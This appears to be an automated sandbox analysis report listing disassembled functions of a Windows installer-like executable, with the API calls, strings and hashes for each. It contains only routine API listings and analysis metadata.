                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a380c5b27ca8ef2e6236f0428f65491e762024a1caeb95240921d3301164247d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C01F430D092489ADB04A7E9A4412EDBBF49F09314F45C1ABA459E7282DAB9050947DB
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00455D88 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000,0045BB39), ref: 00455DC4
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000), ref: 00455DCD
                                                                                                                                                                                                                                                                                                                                                                  • RemoveFontResourceA.GDI32(00000000), ref: 00455DDA
                                                                                                                                                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DEE
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4283692357-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4e17a37cccbf8c6f9d4290cdbadc44853f5f55da4c26a8a62e99d2c9b3665ace
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 88a6b2d0cd2ebf9d052afffcb5c4be27c29a8e8e48dcb03e602a07ae18d4e81c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e17a37cccbf8c6f9d4290cdbadc44853f5f55da4c26a8a62e99d2c9b3665ace
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3F05EB6B4470176EA10B6B69C8BF2B229C9F54745F10883BBA00EF2C3D97CDC04962D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047CA00 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CountSleepTick
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2227064392-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 33762eb08141ace0ee846640535ebc9ec8afb53dfe476f9c6736c0cc59c5be46
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e9c2c7e2fc271270d41d52dba3350464f1e42bdffd51bbfd166b1ef271046f5a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33762eb08141ace0ee846640535ebc9ec8afb53dfe476f9c6736c0cc59c5be46
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93E02B7130964845CA24B2BE28C37BF4A88CB8536AB14453FF08CD6242C42C4D05956E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401340 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000644,?,L2h,004013A3,?,?,00401443,?,?,?,00000000,00004003,00401983), ref: 00401353
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ,2h$H,h$L2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-1199669984
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 257f11d819618187c0ad89deeae81abf426d31df87d8eb7c9386acfed867b27d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 71c91fbc4c3ed8fd369fb1531a6952d3d9178ec9d6227f0a2e7a8dd8dab45303
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 257f11d819618187c0ad89deeae81abf426d31df87d8eb7c9386acfed867b27d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF05E717013018FE724CF29D980656B7E1EBA9365F24807EE5C5D7761D3358C419B94
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00478120 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB,00000000), ref: 00478129
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0047812F
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478151
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478162
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 215268677-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3331d84468cd062744280f6e1aa24963878bc2b2d96e3aea022572b3ec77581d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F030716843016BD600EAB5CC82E9B77DCEB44754F04893E7E98D72C1DA79DC08AB66
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00424250 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                                                                                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                                                                                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                                                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2280970139-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GlobalHandle.KERNEL32 ref: 00406287
                                                                                                                                                                                                                                                                                                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                                                                                                                                                                                                                                                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                                                                                                                                                                                                                                                                                                  • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Global$AllocHandleWire
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2210401237-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047A064 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B8D5,?,00000000,00000000,00000001,00000000,0047A301,?,00000000), ref: 0047A2C5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to parse "reg" constant, xrefs: 0047A2CC
                                                                                                                                                                                                                                                                                                                                                                  • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A139
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-1938159461
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b8f7471c5ab0ae6e6b6eae0653a81c117d87d72a48cd4902c161c4864f0cea27
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3bf0094b3715a844c7fa4d69accdb7e726d223c3dcefaf8b2e4f531663087c06
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8f7471c5ab0ae6e6b6eae0653a81c117d87d72a48cd4902c161c4864f0cea27
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F814174E00149AFCB10DF95D881ADEBBF9EF48314F5081AAE814B7392D7389E05CB99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045C5C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(?), ref: 0045C7FD
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • NumRecs range exceeded, xrefs: 0045C6FA
                                                                                                                                                                                                                                                                                                                                                                  • EndOffset range exceeded, xrefs: 0045C731
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$BuffersFlush
                                                                                                                                                                                                                                                                                                                                                                  • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3593489403-659731555
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 435dd4479ee67e9edf71f770d6d870f8cc5b147b826747c3cdd1ef89c4974954
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 42c6ccb15965a4bc01c0ab80d29458e35b3cecf9486565f2d0e9c4cbdba5a9bf
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 435dd4479ee67e9edf71f770d6d870f8cc5b147b826747c3cdd1ef89c4974954
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5617134A002988FDB24DF25C891AD9B7B5EF49305F0084DAED89AB352D774AEC9CF54
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0048300C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483045
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483057
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Will not restart Windows automatically., xrefs: 00483176
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveForeground
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Will not restart Windows automatically.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 307657957-4169339592
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: df9a9ae9a8219d8b6a1298420550b74bcee7fa449f44545fa147fc9774bd32fa
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7413330208340AED710FFA4DC9AB6E3BA4DB15F05F1408B7E9404B3A2D6BD5A04DB1D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0046CEB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CFE0
                                                                                                                                                                                                                                                                                                                                                                  • Failed to proceed to next wizard page; aborting., xrefs: 0046CFCC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1974262853
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 63d40b18a6e87dbc706e62a2b7ed59e25ea13cd94e581da409b3f01416405f56
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A319E30A08244DFD711EB99D989BA977F6EB05308F1500FBF0489B392D779AE40CB1A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

